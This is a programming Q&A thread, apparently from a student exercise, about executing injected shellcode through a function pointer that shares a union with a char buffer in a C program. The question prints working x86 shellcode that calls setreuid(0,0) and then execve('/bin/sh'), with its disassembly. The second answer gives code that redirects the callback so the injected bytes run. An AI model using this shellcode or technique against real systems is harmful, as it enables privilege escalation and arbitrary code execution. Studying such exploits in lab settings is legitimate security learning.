Executing shell code using a function pointer present in Union

Question

I am trying to inject shell code into the char buffer and execute it using the function pointer. both string and function pointer are in the union. Below is the shell code I am using trying to execute

\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

 0: 31 c0            xor    eax, eax
 2: b0 46            mov    al, 0x46                   ; setreuid (70)
 4: 31 db            xor    ebx, ebx                   ; real uid
 6: 31 c9            xor    ecx, ecx                   ; effective uid
 8: cd 80            int    0x80                       ; setreuid(0, 0)
 a: eb 16            jmp    0x22                       ; jump to call at end
 c: 5b               pop    ebx                        ; get address of "/bin/sh"
 d: 31 c0            xor    eax, eax
 f: 88 43 07         mov    BYTE PTR[ebx + 0x7], al    ; zero terminate "/bin/sh"
12: 89 5b 08         mov    DWORD PTR[ebx + 0x8], ebx  ; + address of "/bin/sh"
15: 89 43 0c         mov    DWORD PTR[ebx + 0xc], eax  ; + NULL pointer
18: b0 0b            mov    al, 0x0b                   ; execve (11)
1a: 8d 4b 08         lea    ecx, [ebx + 0x8]           ; load argv (ptr to "/bin/sh")
1d: 8d 53 0c         lea    edx, [ebx + 0xc]           ; load envp (NULL)
20: cd 80            int    0x80                       ; execve("/bin/sh", "/bin/sh", NULL)
22: e8 e5 ff ff ff   call   0x0c                       ; push address on the stack
27:                  "/bin/sh"                         ;   and jump back

union array_or_function_pointer 
{
        char string[128];
        void (*callback)(void);
};

void trialversion()
{
    printf("This is a trial version. Please purchase the full version to enable all features!\n");
}


int main(int argc, char *argv[])
{
        FILE *fp;
        union array_or_function_pointer obj;
        fp = fopen(argv[1], "r");

        obj.callback = trialversion;
        obj.callback();
        fread(obj.string, 128, 1, fp);
        obj.callback();

        fclose(fp);
        return 0;
}

The shell code is not being executed and I am getting segemntation fault as shown below. I have used -z execstack.

gcc -g -fno-stack-protector -z execstack sample.c -o sample

harsha@hv-XPS:~/ass6$ ./sample pass_junk.txt 
This is a trial version. Please purchase the full version to enable all features!
Segmentation fault (core dumped)

The problem seems to be that program is checking the address present in the shell code

Answer 1

Usually a pointer to function variable is implemented as memory containing the address of the first instruction of the function to be called. You're putting instructions directly in obj, not an address.

To get this sort of test exploit to work, you would need to both get the injected instructions somewhere into memory, and also put the address of the memory containing those instructions into obj.callback. But this will be tricky because most operating systems use Address Space Layout Randomization to make it difficult to predict exactly where objects in the stack will be.

Answer 2

Add sizeof(void(*)()) dummy bytes (eg. \x90\x90\x90\x90) at the beginning of your shellcode.
Then:

#include <stdio.h>

union array_or_function_pointer
{
    char code[/* size */];
    void(*callback)(void);
};

void foo(void) { puts("foo()"); }

int main(int argc, char **argv)
{
    union array_or_function_pointer obj;
    obj.callback = foo;
    obj.callback();

    FILE *fp = fopen(argv[1], "rb");
    fread(obj.code, 1, /* size */, fp);
    fclose(fp);

    obj.callback = &obj.callback + 1;   // the code is located *behind*
    obj.callback();                    //  the pointer value.
}